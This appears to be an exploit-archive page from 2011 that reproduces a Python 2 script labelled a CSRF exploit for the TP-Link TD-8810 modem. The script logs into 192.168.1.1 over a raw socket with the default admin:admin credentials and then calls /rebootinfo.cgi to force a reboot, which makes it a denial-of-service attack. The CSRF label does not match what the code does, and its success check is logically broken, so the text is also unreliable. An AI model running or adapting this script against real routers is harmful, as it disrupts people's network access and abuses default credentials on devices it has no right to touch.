Home / exploits TPLINK TD-8810 Cross Site Request Forgery
Posted on 03 September 2011
#!/usr/bin/python # #[+]Exploit Title: TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit #[+]Date: 01�92011 #[+]Author: C4SS!0 G0M3S #[+]Version: TD-8810 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # from socket import * from time import sleep from base64 import b64encode import os,sys if os.name == 'nt': os.system("color 4f") os.system("cls") os.system("title TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit") else: os.system("clear") print ''' TPLINK TD-8810 CSRF Vulnerability Local Reboot Modem Exploit Created by C4SS!0 G0M3S E-mail louredo_@hotmail.com Blog net-fuzzer.blogspot.com ''' request = ( "GET / HTTP/1.1 " "Host: 192.168.1.1 " "User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21 " "Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3 " "Accept-Encoding: gzip,deflate " "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " "Connection: keep-alive " "Authorization: Basic "+b64encode("admin:admin")+" " # Using the default password ) request2 = ( "GET /rebootinfo.cgi HTTP/1.1 " "Host: 192.168.1.1 " "User-Agent: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.21) Gecko/20110830 Firefox/3.6.21 " "Accept-Language: pt-br,pt;q=0.8,en-us;q=0.5,en;q=0.3 " "Accept-Encoding: gzip,deflate " "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " "Connection: keep-alive " "Authorization: Basic "+b64encode("admin:admin")+" " # Using the default password ) print " [+]Connecting in the Modem TP-LINK TD-8810..." sleep(1) s = socket(AF_INET,SOCK_STREAM,0) s.connect(('192.168.1.1',80)) print " [+]Sending HTTP Request..." sleep(1) s.send(request) data = s.recv(100000) s.close() if (int(data.split(" ")[0].split(" ")[1]) == "200") == 0: print " [+]User Logged successfully." sleep(1) print " [+]Sending the request to shutdown the modem..." sleep(1) s = socket(AF_INET,SOCK_STREAM,0) s.connect(('192.168.1.1',80)) s.send(request2) print " [+]Exploit Sent wait your Modem Reboot... :)" sleep(1) s.close() else: print " [+]I can't log in your modem. Maybe Password Or Username is Wrong." sleep(1)
